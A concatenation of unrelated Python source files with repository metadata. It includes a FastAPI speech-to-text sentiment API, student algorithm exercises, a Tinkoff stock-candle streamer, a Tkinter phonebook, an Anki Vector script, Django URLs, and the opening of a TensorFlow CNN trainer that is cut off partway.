conn.cursor()\n\nnltk.download(\"punkt\")\nnltk.download(\"averaged_perceptron_tagger\")\nnltk.download(\"wordnet\")\n\n\nclass OrgQuery(BaseModel):\n name: str\n\n\nclass AudioQuery(BaseModel):\n url: str\n client_name: str\n agent_name: str\n date: str\n unique_number: int\n\n\nclass TextQuery(BaseModel):\n string: str\n\n\nclass CommentQuery(BaseModel):\n comment: str = Body(...)\n old_comment: str = Body(...)\n\n\nclass SenderQuery(BaseModel):\n sender: str = Body(...)\n old_sender: str = Body(...)\n\n\nclass DeleteQuery(BaseModel):\n old_comment: str = Body(...)\n\n\nclass RequestDelete(BaseModel):\n Request_ID: int = Body(...)\n\n\nclassifier = NaiveBayes()\n\n# middleware = 
[\n# Middleware(\n# CORSMiddleware,\n# allow_origins=[\"*\"],\n# allow_credentials=True,\n# allow_methods=[\"*\"],\n# allow_headers=[\"*\"],\n# )\n# ]\n\napp = FastAPI()\n\napp.add_middleware(GZipMiddleware)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/\")\ndef read_root():\n lines = None\n with open(\"./docs/index.html\", \"r\", encoding=\"utf-8\") as f:\n lines = \"\".join(f.readlines())\n return HTMLResponse(content=lines)\n\n\n@app.get(\"/doc\")\ndef Doc():\n lines = None\n with open(\"./docs/doc.html\", \"r\", encoding=\"utf-8\") as f:\n lines = \"\".join(f.readlines())\n return HTMLResponse(content=lines)\n\n\n# @app.post(\"/stt/addOrg/\")\n# def AddOrg(query: OrgQuery):\n# N = 20\n# token_key = \"\".join(\n# random.SystemRandom().choice(string.ascii_uppercase + string.digits)\n# for _ in range(N)\n# )\n# print(token_key)\n# cursor.execute(\"SELECT * FROM Authorisation\")\n# result = cursor.fetchall()\n# print(result)\n\n\n@app.post(\"/stt/addRequest/{org_id}\")\ndef AddRequest(org_id: str, query: AudioQuery, req: Request):\n\n result = None\n\n # Auth here\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n db_token_id = cursor.fetchone()\n\n # db_token_id = True # REMEBER TO COMMENT THISSSSSS\n if db_token_id is None:\n return {\"response\": \"Token Error\"}\n else:\n if query.url == \"testing\":\n # return {\"Result\": \"Not Applicable.\"}\n result = Transcribe(os.getcwd() + \"\\\\test.mp3\", True).getResult()\n else:\n result = Transcribe(query.url.strip()).getResult()\n\n # Result [0] = sender\n # Result [1] = text\n\n conversations = []\n word_counts_sentence = \"\"\n cnt = 1\n request = dict()\n request[\n \"Request_ID\"\n ] = f\"{query.client_name}_{query.agent_name}_{query.date}_{query.unique_number}\"\n\n for r in result:\n obj = {\"Conversation_ID\": cnt, \"Sender\": r[0], \"Content\": r[1]}\n classifiedObj = classifier.classifySentences(r[1])\n obj[\"Sentiment\"] = classifiedObj[\"sentiment\"]\n obj[\"Confidence\"] = classifiedObj[\"confidence\"] * 100\n obj[\"Comment\"] = \"\"\n obj[\"Request_ID\"] = request[\"Request_ID\"]\n conversations.append(obj)\n cnt += 1\n\n word_counts_sentence += TextProcessing(r[1]).getProcessedSentence() + \" \"\n\n word_counts = TextProcessing(word_counts_sentence).getWordCounts()\n word_counts = dict(\n sorted(word_counts.items(), key=lambda x: x[1], reverse=True)\n )\n\n for key, value in word_counts.items():\n\n request[\"Highest_Count\"] = value\n break\n\n request[\"Audio_URL\"] = query.url\n request[\"Date\"] = query.date\n request[\"Org_ID\"] = org_id\n\n objCnt = 0\n posCnt = 0\n for c in conversations:\n posCnt += c[\"Sentiment\"] == \"Positive\"\n objCnt += 1\n\n request[\"Sentiment_Distribution_Pos\"] = posCnt / objCnt * 100\n request[\"Sentiment_Distribution_Neg\"] = (objCnt - posCnt) / objCnt * 100\n print(request)\n\n words = []\n cnt = 1\n for key, value in word_counts.items():\n\n obj = dict()\n obj[\"Word_ID\"] = cnt\n obj[\"Word\"] = key\n obj[\"IsSensitive\"] = SensitiveWordsMarking(str(key)).isSensitiveWord()\n obj[\"Word_Count\"] = value\n obj[\"Request_ID\"] = request[\"Request_ID\"]\n words.append(obj)\n\n cnt += 1\n\n # Insert Data to MSSQL\n word_list = []\n conversation_list = []\n\n request_data = [\n (\n request[\"Request_ID\"],\n request[\"Audio_URL\"],\n request[\"Sentiment_Distribution_Pos\"],\n 
request[\"Sentiment_Distribution_Neg\"],\n request[\"Highest_Count\"],\n request[\"Date\"],\n request[\"Org_ID\"],\n )\n ]\n\n cursor.executemany(\n \"INSERT INTO Request (Request_ID, Audio_URL, Sentiment_Distribution_Pos, Sentiment_Distribution_Neg, Highest_Count, Date, Org_ID) VALUES (%s,%s,%s,%s,%d,%s,%s)\",\n request_data,\n )\n\n for w in words:\n words_data = (\n w[\"Word_ID\"],\n w[\"Word\"],\n w[\"IsSensitive\"],\n w[\"Word_Count\"],\n w[\"Request_ID\"],\n )\n word_list.append(words_data)\n\n cursor.executemany(\n \"INSERT INTO Words (Word_ID, Word, IsSensitive, Word_Count, Request_ID) VALUES (%d,%s,%d,%d,%s)\",\n word_list,\n )\n\n for c in conversations:\n conversation_data = (\n c[\"Conversation_ID\"],\n c[\"Sender\"],\n c[\"Content\"],\n c[\"Sentiment\"],\n c[\"Confidence\"],\n c[\"Comment\"],\n c[\"Request_ID\"],\n )\n conversation_list.append(conversation_data)\n\n cursor.executemany(\n \"INSERT INTO Conversations (Conversation_ID, Sender, Content, Sentiment, Confidence, Comment, Request_ID) VALUES (%d,%s,%s,%s,%s,%s,%s)\",\n conversation_list,\n )\n\n conn.commit()\n\n return {\"response\": \"Success\"}\n\n\n@app.post(\"/stt/deleteComment/{conversation_id}/{request_id}\")\ndef deleteComment(\n conversation_id: int,\n request_id: str,\n delete_comment: DeleteQuery,\n req: Request,\n):\n # Auth here\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n db_token_id = cursor.fetchone()\n # db_token_id = True\n if db_token_id is None:\n return {\"response\": \"Error\"}\n else:\n values = (request_id, conversation_id)\n\n cursor.execute(\n \"SELECT Comment FROM Conversations WHERE Request_ID= %s AND Conversation_ID=%d \",\n values,\n )\n\n db_old_comment = cursor.fetchone()[0]\n # db_old_comment = True\n if delete_comment.old_comment != db_old_comment:\n conn.commit()\n return {\"response\": \"Error\"}\n\n values = (request_id, conversation_id)\n\n cursor.execute(\n \"UPDATE Conversations SET Comment = '' WHERE Request_ID= %s AND Conversation_ID=%d \",\n values,\n )\n\n conn.commit()\n\n return {\"response\": \"Success\"}\n\n\n@app.post(\"/stt/updateComment/{conversation_id}/{request_id}\")\ndef updateComment(\n conversation_id: int,\n request_id: str,\n comment_update: CommentQuery,\n req: Request,\n):\n # Auth here\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n db_token_id = cursor.fetchone()\n # db_token_id = True\n if db_token_id is None:\n return {\"response\": \"Error\"}\n else:\n values = (request_id, conversation_id)\n\n cursor.execute(\n \"SELECT Comment FROM Conversations WHERE Request_ID= %s AND Conversation_ID=%d \",\n values,\n )\n\n db_old_comment = cursor.fetchone()[0]\n\n if comment_update.old_comment != db_old_comment:\n conn.commit()\n return {\"response\": \"Error\"}\n\n values = (comment_update.comment, request_id, conversation_id)\n\n cursor.execute(\n \"UPDATE Conversations SET Comment = %s WHERE Request_ID= %s AND Conversation_ID= %d \",\n values,\n )\n\n conn.commit()\n\n return {\"response\": \"Success\"}\n\n\n@app.post(\"/stt/updateSender/{conversation_id}/{request_id}\")\ndef updateSender(\n conversation_id: int, request_id: str, sender_update: SenderQuery, req: Request\n):\n # Auth here\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n db_token_id = cursor.fetchone()\n # db_token_id = True\n if db_token_id is None:\n return 
{\"response\": \"Error\"}\n else:\n values = (request_id, conversation_id)\n\n cursor.execute(\n \"SELECT Sender FROM Conversations WHERE Request_ID= %s AND Conversation_ID=%d\",\n values,\n )\n\n db_old_sender = cursor.fetchone()[0]\n # db_old_sender = 1\n if sender_update.old_sender != db_old_sender:\n conn.commit()\n return {\"response\": \"Error\"}\n\n values = (sender_update.sender, request_id, conversation_id)\n\n cursor.execute(\n \"UPDATE Conversations SET Sender = %s WHERE Request_ID= %s AND Conversation_ID= %d\",\n values,\n )\n\n conn.commit()\n\n return {\"response\": \"Updated Successfully\"}\n\n\n@app.get(\"/stt/requests/{org_id}\")\nasync def ReturnRequests(org_id: str, req: Request):\n\n print(req.headers)\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n\n db_token_id = cursor.fetchone()\n\n # db_token_id = True\n if db_token_id is None:\n return {\"response\": \"Error\"}\n else:\n cursor.execute(\"SELECT Request_ID FROM Request WHERE Org_ID = %s\", org_id)\n rows = cursor.fetchall()\n # rows = 1\n RequestList = []\n for row in rows:\n data = row[0]\n RequestList.append(data)\n\n result = json.dumps(RequestList)\n\n return {\"Request\": result}\n\n\n@app.get(\"/stt/request/{req_id}\")\nasync def STT_Test(req_id: str, req: Request):\n\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n\n db_token_id = cursor.fetchone()\n\n # db_token_id = True\n if db_token_id is None:\n return {\"response\": \"Error\"}\n else:\n cursor.execute(\"SELECT * FROM Request WHERE Request_ID = %s\", req_id)\n rows = cursor.fetchall()\n for row in rows:\n data = {\n \"request_id\": row[0],\n \"sentiment\": {\"distribution\": {\"pos\": row[2], \"neg\": row[3]}},\n \"highest_count\": row[4],\n \"date\": row[5],\n }\n\n cursor.execute(\"SELECT * FROM Words WHERE Request_ID = %s \", req_id)\n rows = cursor.fetchall()\n objects_list = []\n for row in rows:\n object_dict = {\n \"word_id\": row[0],\n \"word\": row[1],\n \"isClicked\": False,\n \"isSearched\": True,\n \"isSensitive\": row[2],\n \"count\": row[3],\n }\n objects_list.append(object_dict)\n\n cursor.execute(\"SELECT * FROM Conversations WHERE Request_ID = %s \", req_id)\n rows = cursor.fetchall()\n objects_list1 = []\n for row in rows:\n object_dict = {\n \"conversation_id\": row[0],\n \"from\": row[1],\n \"content\": row[2],\n \"sentiment\": row[3],\n \"confidence\": row[4],\n \"isClicked\": False,\n \"comment\": row[5],\n }\n objects_list1.append(object_dict)\n\n result_dict = {\n \"request_id\": data[\"request_id\"],\n \"sentiment\": data[\"sentiment\"],\n \"highest_count\": data[\"highest_count\"],\n \"date\": data[\"date\"],\n \"words\": objects_list,\n \"conversations\": objects_list1,\n }\n\n result = json.dumps(result_dict)\n\n # with open(\"sample.json\", \"w\") as outfile:\n # outfile.write(result)\n\n return {\"Request\": result}\n","repo_name":"tzubindev/STT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23407475128","text":"\"\"\" PROBLEM\n\tFind the min and max simultaneously\n\n\"\"\"\n\n\"\"\" SOLUTION\n\tCompare every pair with a step size of 2. 
Compute the local min and local max \n\tfor each pair and update the global min and global max.\n\n\"\"\"\n\ndef find_min_max(A):\n\tdef min_max(a,b):\n\t\tif a < b:\n\t\t\treturn a, b\n\t\telse:\n\t\t\treturn b, a\n\n\tif len(A) == 1:\n\t\treturn (A[0], A[0])\n\n\tglobal_minm, global_maxm = min_max(A[0], A[1])\n\n\tfor i in range(2, len(A)-1, 2):\n\t\tlocal_minm, local_maxm = min_max(A[i], A[i+1])\n\t\tglobal_minm, global_maxm = min(local_minm, global_minm), max(local_maxm, global_maxm)\n\t\n\t# odd elements case\n\tif len(A)%2 == 1:\n\t\tglobal_minm, global_maxm = min(A[-1], global_minm), max(A[-1], global_maxm)\n\n\treturn global_minm, global_maxm \n\n\nA = [3,2,5,1,2,4]\nres = find_min_max(A)\nprint(\"Array: {}\\nMin: {}, Max: {}\".format(A, res[0], res[1]))\n\n","repo_name":"sheelabhadra/Elements-Programming-Interviews","sub_path":"Strings/max_min_simultaneously.py","file_name":"max_min_simultaneously.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16684769564","text":"import time\nimport telebot\n\n\nfrom tinkoff.invest import CandleInterval\nfrom tinkoff.invest.retrying.settings import RetryClientSettings\nfrom tinkoff.invest.retrying.sync.client import RetryingClient\nfrom tinkoff.invest.utils import now\n\nfrom config import ACCESS_TOKEN\nfrom transformation import *\nfrom database import *\nfrom extraction import *\n\n# Build the historical data array\ndef getHistoryShare(shareList):\n    historyShare = {}\n    retry_settings = RetryClientSettings(use_retry=True, max_retry_attempt=2)\n    with RetryingClient(ACCESS_TOKEN, settings=retry_settings) as client:\n        for candle in client.get_all_candles(\n            figi=shareList[3],\n            from_=now() - timedelta(days=1),\n            interval=CandleInterval.CANDLE_INTERVAL_1_MIN,\n        ):\n            historyShareDetail = {}\n            # Build the detail entry\n            historyShareDetail['name'] = shareList[1]\n            historyShareDetail['ticker'] = shareList[2]\n            historyShareDetail['FIGI'] = shareList[3]\n            historyShareDetail['lot'] = shareList[6]\n            historyShareDetail['realPrice'] = convertToRealPrice(candle.open.units, candle.open.nano)\n            historyShareDetail['unitsPrice'] = candle.open.units\n            historyShareDetail['nanoPrice'] = candle.open.nano\n            historyShareDetail['timeCandle'] = convertToRealDateTime(candle.time)\n\n            # Build the dictionary keyed by candle timestamp\n            historyShare[convertToTimeStamp(candle.time)] = historyShareDetail\n\n    return historyShare\n\ndef streamingShareOnline():\n    shareList = getShareRub()\n\n    while True:\n        for share in shareList:\n            try:\n                historyShare = getHistoryShare(share)\n                if len(historyShare) > 0:\n                    if historyShare is not None:\n                        extractionHistoryData(historyShare)\n                time.sleep(1.2)\n            except Exception as error:\n                print(error)\n                continue\n            finally:\n                continue\n\ndef main():\n    streamingShareOnline()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"PhilippKaz/StreamerSharesTinkoff","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31249131781","text":"# ----------------------------------------\n# 22\n# Variables\n# ----------------------------------------\nfrom modules.utils import *\n\n\nbanner('Strings')\n# ----------------------------------------\n\ngreeting = \"Bruce\"\n_myName = \"Tim\"\nTim45 = \"Good\"\nTim_Was_57 = \"Hello\"\nGreeting = \"There\"\n\nprint(Tim_Was_57 + ' ' + greeting)\n\nage = 48\n# ERROR: Can't concat a string and 
an integer\n# print(greeting + age)\n\n\nbanner('Numbers')\n# ----------------------------------------\n\na = 12\nb = 3\n\nprint(a+b)\nprint(a-b)\nprint(a*b)\n\n\n# BELOW: normally this is division that returns as an integer.\n# However, 3.6.4 by default seems to do the conversion.\n# It only forces a float when one of the numbers is actually\n# a float\n\nprint(a/b)\nprint(a//b)\nprint(a % b)\n\nbanner(\"For Loop\")\n# ----------------------------------------\nfor i in range(1, a/b):\n\tprint(i)\n\n\nbanner(\"Formulas & Casting\")\n# ----------------------------------------\nformula = ((((a + b) / 3) - 4) * 12)\nprint(formula)\nprint(float(formula)) # implicit cast to float\n\na = \"RobK\"\nb = 48\nprint(a+str(b)) # implicit cast to string\n","repo_name":"rob-kistner/udemy-python-masterclass","sub_path":"22_variables.py","file_name":"22_variables.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7598463358","text":"#frequency analysis of a given plain text\nfrom collections import Counter\n\ndef is_ascii(s):\n return all(ord(c) < 128 for c in s)\n\ndef is_english(s):\n if (is_ascii(s)):\n text = ''.join(c for c in s if c.isalpha())\n if (text == ''):\n return False\n else:\n lext = text.lower()\n chk = 'etaoin'\n cnt = Counter(lext).most_common(3)\n cntn = [cnt[0][0],cnt[1][0],cnt[2][0]]\n cntjn = ''.join(cntn)\n print(cnt)\n for x in cntjn:\n if x not in chk:\n return False\n else:\n return True\n\n \n","repo_name":"krakhit/Information-security-course","sub_path":"plaintextfreq.py","file_name":"plaintextfreq.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41328260438","text":"from tkinter import *\nimport datetime\nfrom mypeople import Mypeople\nfrom addpeople import Addpeople\nfrom Aboutus import About\n\ndate = datetime.datetime.now().date()\ndate = str(date)\n\nclass Application(object):\n def __init__(self,master):\n self.master =master\n\n\n\n # frame\n self.top =Frame(master, height =150 , bg=\"white\")\n self.top.pack(fill =X)\n\n self.bottom = Frame(master, height=500, bg=\"RoyalBlue1\")\n self.bottom.pack(fill=X)\n\n # top frame design\n self.top_image = PhotoImage(file = '4.png')\n self.top_image_label = Label(self.top,image = self.top_image,bg=\"white\")\n self.top_image_label.place(x=100,y=10)\n\n self.heading =Label(self.top,text=\"PhoneBook\",font=\"Times 26 bold\",bg=\"white\",fg = \"#426ff5\")\n self.heading.place(x=220,y=40)\n\n self.heading = Label(self.top, text=\"App\", font=\"Times 26 bold\", bg=\"white\", fg=\"#111\")\n self.heading.place(x=400, y=40)\n\n # date\n self.date_label = Label(self.top,text=\"Date: \"+date, font=\"times 12 bold\",fg=\"#111\",bg=\"white\")\n self.date_label.place(x=520,y=5)\n\n\n # button1 view People\n self.viewbtn =Button(self.bottom, text =\"My People\" ,font=\"times 12 bold\",width =\"20\",bg=\"RoyalBlue3\",fg=\"white\",command=self.my_people)\n self.viewbtn.place(x=250,y=40)\n self.bottom_image = PhotoImage(file='5.1.png')\n self.bottom_image_label = Label(self.bottom, image=self.bottom_image,bg=\"RoyalBlue1\")\n self.bottom_image_label.place(x=180, y=30)\n\n # button2 add People\n self.addpeople = Button(self.bottom, text=\"Add People\", font=\"times 12 bold\", width=\"20\",bg=\"RoyalBlue3\",fg=\"white\",command = self.addpeoplefunction)\n self.addpeople.place(x=250, y=180)\n self.bottom_image1 = PhotoImage(file='6.1.png')\n 
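# Keeping each PhotoImage as an attribute on self preserves a live\n        # reference: if a Tkinter PhotoImage is only referenced by a local\n        # variable, it can be garbage-collected and the label goes blank.\n        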
self.bottom_image1_label = Label(self.bottom, image=self.bottom_image1, bg=\"RoyalBlue1\")\n        self.bottom_image1_label.place(x=180, y=170)\n\n\n\n        # button3 about us\n        self.aboutus = Button(self.bottom, text=\"About Us\", font=\"times 12 bold\", width=\"20\",bg=\"RoyalBlue3\",fg=\"white\",command = self.about_us)\n        self.aboutus.place(x=250, y=290)\n        self.bottom_image2 = PhotoImage(file='8.1.png')\n        self.bottom_image2_label = Label(self.bottom, image=self.bottom_image2, bg=\"RoyalBlue1\")\n        self.bottom_image2_label.place(x=180, y=280)\n\n    def my_people(self):\n        people = Mypeople()\n    def addpeoplefunction(self):\n        addpeoplewindow = Addpeople()\n    def about_us(self):\n        about_page= About()\ndef main():\n    root=Tk()\n    app= Application(root)\n    root.title(\"PhoneBook\")\n    root.geometry(\"650x550+350+200\")\n    root.resizable(False,False)\n    root.mainloop()\n\n\nif __name__== '__main__':\n    main()","repo_name":"Sarthak88221/Phonebook-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18165232652","text":"import sys\nimport anki_vector\nfrom anki_vector.events import Events\nfrom anki_vector.util import degrees\nimport functools\nimport threading\nimport io\nimport time\n\nevt = threading.Event()\n\n#Create an event listener for audible cue\n#In this instance, it's upon hearing the\n#words \"Hey, Vector\"\n\ndef on_wake_word(robot, event_type, event):\n    robot.anim.play_animation(\"anim_observing_far_subtle_01\")\n    robot.anim.play_animation(\"anim_referencing_curious_01_head_angle_20\")\n    print(\"Starting video viewer. Use Ctrl+C to quit.\")\n    robot.say_text(\"Quietly observing from the shadows.\")\n    time.sleep(20)\n    robot.viewer.stop_video()\n\n\ndef main(): \n    args = anki_vector.util.parse_command_args()\n    with anki_vector.Robot(args.serial,\n                           show_viewer=True, \n                           enable_camera_feed=True,) as robot:\n        wake_word_handler = functools.partial(on_wake_word, robot)\n        robot.events.subscribe(wake_word_handler, Events.wake_word)\n        #robot.conn.run_coroutine(robot.events.dispatch_event_by_name('say_it dispatched', event_name='say_it'))\n\n        try:\n            while True:\n                time.sleep(10)\n        except KeyboardInterrupt:\n            pass\n\n        robot.events.unsubscribe(wake_word_handler, Events.wake_word)\n\nif __name__ == \"__main__\":\n    main()\n\n","repo_name":"publikwerker/anki_security","sub_path":"anki_security2.py","file_name":"anki_security2.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41727034178","text":"from django.conf.urls.defaults import *\nfrom django.contrib import admin\n\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Enable Slumber\n    (r'^slumber/', include('slumber.urls')),\n\n    # Uncomment the next line to enable the admin:\n    (r'^admin/(.*)', admin.site.root),\n)\n","repo_name":"hotkit/django-async","sub_path":"test-projects/django_1_0/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"61"} +{"seq_id":"70591756035","text":"\"\"\"Marc Ojalvo and Daniel Licht\nCMPS 1500\nThursday 3:30-4:45\nLab 6 Part 0\n02/05/2018\"\"\"\n\n'''This program contains two functions used to determine whether lists\nof numbers are sorted.\n'''\n\ndef is_sorted(aList):\n    \"\"\"Returns True if a list is in increasing order and\n    False if not.\n    Args:\n        aList (list): List of numbers\n    Returns:\n        True (bool): If in 
increasing order\n        False (bool): If not in increasing order\n    \"\"\"\n    if len(aList) <= 1:\n        return True\n    if aList[0] < aList[1]:\n        return is_sorted(aList[1:])\n    else:\n        return False\n    \ndef is_file_sorted(filename):\n    \"\"\"Returns True if a file of numbers is in increasing order and\n    False if not.\n    Args:\n        filename (str): File of numbers\n    Returns:\n        True (bool): If in increasing order\n        False (bool): If not in increasing order\n    \"\"\"\n    f = open(filename, 'r')\n    text = f.read()\n    f.close()\n    numList = text.split()\n    for i in range(len(numList)):\n        numList[i] = int(numList[i])\n    return is_sorted(numList)\n\n\n","repo_name":"daniellicht13/CMPS-1500","sub_path":"1500/Lab 6/lab6pr0.py","file_name":"lab6pr0.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10740399627","text":"def gcdIter(a, b):\r\n    gcd = 1\r\n    if a>b:\r\n        small = b\r\n        large = a\r\n    else:\r\n        small = a\r\n        large = b\r\n    \r\n    if large%small == 0:\r\n        gcd = small\r\n    else: \r\n        for i in range(1, small//2 + 1):\r\n            if small%i == 0 and large%i ==0:\r\n                gcd = i\r\n    return gcd\r\nprint(gcdIter(49,7))\r\n#print(round(1/2))","repo_name":"subratcall/EDX_Intro-to-CS-with-python_MIT6001X","sub_path":"week-2/p4_gcd_with_iteration.py","file_name":"p4_gcd_with_iteration.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4614734188","text":"\"\"\"Train a Convolutional Neural Network.\r\nThis version uses data converted to a TFRecords file containing tf.train.Example \r\nprotocol buffers.\r\n\"\"\"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport time\r\nimport datetime\r\nimport math\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pylab as plt\r\n\r\n# Basic model parameters as external flags.\r\nflags = tf.app.flags\r\nFLAGS = flags.FLAGS\r\nflags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')\r\nflags.DEFINE_integer('num_epochs', 10, 'Number of epochs to run trainer.')\r\nflags.DEFINE_integer('num_epochs_eval', 1, 'Number of epochs to run evaluation.')\r\nflags.DEFINE_integer('batch_size', 100, 'Batch size.')\r\nflags.DEFINE_integer('image_pixels', 4800, 'Number of pixels in image')\r\n\r\nflags.DEFINE_integer('hidden1', 32, 'Number of units in hidden layer 1.')\r\nflags.DEFINE_integer('hidden2', 2, 'Number of units in hidden layer 2.')\r\nflags.DEFINE_integer('num_classes', 1, 'Number of classes')\r\n\r\nflags.DEFINE_string('train_dir', 'output', 'Directory with the training data.')\r\nflags.DEFINE_string('training_data_file', 'train-00000-of-00001', 'Training data file')\r\nflags.DEFINE_string('evaluation_data_file', 'validation-00000-of-00001', 'Evaluation data file')\r\n\r\n\r\ndef read_and_decode(filename_queue):\r\n    reader = tf.TFRecordReader()\r\n    _, serialized_example = reader.read(filename_queue)\r\n    features = tf.parse_single_example(\r\n    \tserialized_example,\r\n    \tfeatures={\r\n            'image/height':tf.FixedLenFeature([], tf.int64),\r\n            'image/width': tf.FixedLenFeature([], tf.int64),\r\n            'image/colorspace': tf.FixedLenFeature([], tf.string),\r\n            'image/channels': tf.FixedLenFeature([], tf.int64),\r\n            'image/class/label': tf.FixedLenFeature([], tf.int64),\r\n            'image/class/text': tf.FixedLenFeature([], tf.string),\r\n            'image/format': 
tf.FixedLenFeature([], tf.string),\r\n 'image/filename': tf.FixedLenFeature([],tf.string),\r\n 'image/encoded': tf.FixedLenFeature([], tf.string),\r\n 'image/avg_intensity': tf.FixedLenFeature([], tf.float32),\r\n 'image/intensity_label': tf.FixedLenFeature([], tf.float32)\r\n })\r\n\r\n # Convert from a scalar string tensor to a uint8 tensor with shape\r\n # [FLAGS.image_pixels].\r\n image = tf.decode_raw(features['image/encoded'], tf.uint8)\r\n image.set_shape([FLAGS.image_pixels])\r\n\r\n # Convert from [0, 255] -> [-0.5, 0.5] floats.\r\n image = tf.cast(image, tf.float32) * (1. / 255) - 0.5\r\n \r\n # Convert pixel intensity\r\n gt = tf.cast(features['image/avg_intensity'], tf.float32) * (1. / 255) - 0.5\r\n \r\n # Add noise to ground truth\r\n label = tf.cast(features['image/intensity_label'], tf.float32) * (1. / 255) - 0.5\r\n\r\n return image, label, gt\r\n\r\n \"\"\"Reads input data num_epochs times.\r\n Args:\r\n train: Selects between the training (True) and validation (False) data.\r\n batch_size: Number of examples per returned batch.\r\n num_epochs: Number of times to read the input data, or 0/None to\r\n train forever.\r\n Returns:\r\n A tuple (images, labels), where:\r\n * images is a float tensor with shape [batch_size, FLAGS.image_height, FLAGS.image_width, FLAGS.num_channels]\r\n in the range [-0.5, 0.5].\r\n * labels is an int32 tensor with shape [batch_size] with the true label,\r\n a number in the range [0, FLAGS.num_classes).\r\n Note that an tf.train.QueueRunner is added to the graph, which\r\n must be run using e.g. tf.train.start_queue_runners().\r\n \"\"\"\r\ndef inputs(train, batch_size, num_epochs):\r\n\r\n if not num_epochs: num_epochs = None\r\n filename = os.path.join(FLAGS.train_dir,\r\n FLAGS.training_data_file if train else FLAGS.evaluation_data_file)\r\n\r\n with tf.name_scope('input'):\r\n filename_queue = tf.train.string_input_producer(\r\n [filename], num_epochs=num_epochs)\r\n\r\n # Even when reading in multiple threads, share the filename queue\r\n image, label, gt = read_and_decode(filename_queue)\r\n\r\n # Shuffle the examples and collect them into FLAGS.batch_size batches.\r\n # (Internally uses a RandomShuffleQueue.)We run this in two threads to avoid being a bottleneck.\r\n images, sparse_labels, gt = tf.train.shuffle_batch(\r\n [image, label, gt], batch_size=batch_size, num_threads=2,\r\n capacity=1000 + 3 * batch_size,\r\n # Ensures a minimum amount of shuffling of examples.\r\n min_after_dequeue=1000)\r\n \r\n return images, sparse_labels, gt\r\n\r\ndef weight_variable(shape):\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial)\r\n\r\ndef bias_variable(shape):\r\n initial = tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial)\r\n\r\ndef conv2d(x, W):\r\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\r\n\r\ndef max_pool_2x2(x):\r\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\r\n strides=[1, 2, 2, 1], padding='SAME')\r\n\t\r\ndef inference_graph(images, train):\r\n\r\n\t### Dimension info: images shape: unknown at this point since images is a placeholder\r\n\t### Dimension info: images shape: expected to be [100, 4800] for a batch size of 100 and image size 60*80*1\r\n\tprint(\"images dim:\")\r\n\tprint(images.get_shape())\r\n\t\r\n\t### Dimension info: images_reshaped shape: expected to be [100, 60, 80, 1]\r\n\timages_reshaped = tf.reshape(images, [-1,60,80,1])\r\n\t#images_resized = tf.image.resize_images(images_reshaped, [60,80])\r\n\tprint(\"images_reshaped 
